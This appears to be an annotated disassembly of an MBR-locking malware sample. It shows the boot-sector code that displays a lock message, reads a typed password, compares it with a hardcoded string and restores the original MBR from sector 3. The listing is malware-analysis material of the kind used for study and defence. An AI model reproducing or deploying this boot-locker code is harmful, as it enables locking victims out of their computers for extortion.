MBRLock
某样本中提取
; =============== S U B R O U T I N E ======================================= start_7C03 proc far ; CODE XREF: j_start_7C03↑j ; start_7C03+B8↓j mov ax, cs mov ds, ax mov ss, ax mov es, ax mov sp, 100h mov bp, 7CEDh ; Your disk have a lock!!!Please enter the unlock password mov bx, 7CEDh call strlen_C7 mov cx, ax ; get note'lens to cx mov ax, 1301h mov bx, 0Ch mov dl, 0 int 10h ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA) ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number ; DH,DL = row,column of starting cursor position, CX = length of string ; ES:BP -> start of string mov ax, 0B800h add ax, 0A0h mov ds, ax assume ds:nothing xor cx, cx xor bx, bx getchar_7C2F: ; CODE XREF: start_7C03+44↓j ; start_7C03+50↓j xor ax, ax int 16h ; KEYBOARD - READ CHAR FROM BUFFER, WAIT IF EMPTY ; Return: AH = scan code, AL = character cmp al, 8 ; backspace jz short PressBackspace cmp al, 0Dh ; enter jz short CheckPassword mov ah, 2 mov [bx], al mov [bx+1], ah add bx, 2 inc cx jmp getchar_7C2F ; --------------------------------------------------------------------------- PressBackspace: ; CODE XREF: start_7C03+32↑j sub bx, 2 dec cx xor ax, ax mov [bx], ax jmp getchar_7C2F ; --------------------------------------------------------------------------- CheckPassword: ; CODE XREF: start_7C03+36↑j mov ax, cs mov es, ax xor bx, bx mov si, 7CDAh ; AAAAAAAAAAAAAAAAAA mov cl, cs:pswd_len_7CD9 mov ch, 0 strcmp_7C66: ; CODE XREF: start_7C03+72↓j db 3Eh mov al, [bx] mov ah, es:[si] ; get input char==>al ; si==>correct passwd==>"AAAAAAAAAAAAAAAAAA" cmp al, ah jnz short NotMatch add bx, 2 inc si loop strcmp_7C66 xor ax, ax mov ax, 7E00h mov es, ax assume es:nothing xor bx, bx mov ah, 2 ; read mov dl, 80h mov al, 1 ; number of sectors to read mov dh, 0 mov ch, 0 mov cl, 3 ; sector==>to read int 13h ; DISK - READ SECTORS INTO MEMORY ; AL = number of sectors to read, CH = track, CL = sector ; DH = head, DL = drive, ES:BX -> buffer to fill ; Return: CF set on error, AH = status, AL = number of sectors read xor bx, bx mov dl, 80h mov ah, 3 ; write mov al, 1 mov dh, 0 mov ch, 0 mov cl, 1 ; sector==>to write int 13h ; DISK - WRITE SECTORS FROM MEMORY ; AL = number of sectors to write, CH = track, CL = sector ; DH = head, DL = drive, ES:BX -> buffer ; Return: CF set on error, AH = status, AL = number of sectors written jmp end_7CBE ; --------------------------------------------------------------------------- NotMatch: ; CODE XREF: start_7C03+6B↑j mov bx, 0B800h add bx, 38h ; '8' mov al, 58h ; 'X' mov [bx], al mov cx, word ptr cs:pswd_len_7CD9 xor ax, ax loc_7CB3: ; CODE XREF: start_7C03+B6↓j mov [bx], ax add bx, 2 loop loc_7CB3 jmp near ptr start_7C03 ; --------------------------------------------------------------------------- end_7CBE: ; CODE XREF: start_7C03+9B↑j mov ax, 0FFFFh push ax mov ax, 0 push ax retf start_7C03 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= strlen_C7 proc near ; CODE XREF: start_7C03+11↑p push cx push bx loop_7CC9: ; CODE XREF: strlen_C7+C↓j db 3Eh ; Your disk have a lock!!!Please enter the unlock password mov cl, [bx] cmp cl, 0 jz short ret_7CD6 inc bx inc ax jmp loop_7CC9 ; Your disk have a lock!!!Please enter the unlock password ; --------------------------------------------------------------------------- ret_7CD6: ; CODE XREF: strlen_C7+8↑j pop cx pop bx retn strlen_C7 endp ; --------------------------------------------------------------------------- pswd_len_7CD9 db 12h ; DATA XREF: start_7C03+5C↑r ; start_7C03+A9↑r aAaaaaaaaaaaaaa db 'AAAAAAAAAAAAAAAAAA',0 aYourDiskHaveAL db 'Your disk have a lock!!!Please enter the unlock password',0 db 0D8h dup(0), 55h, 0AAh seg000 ends end
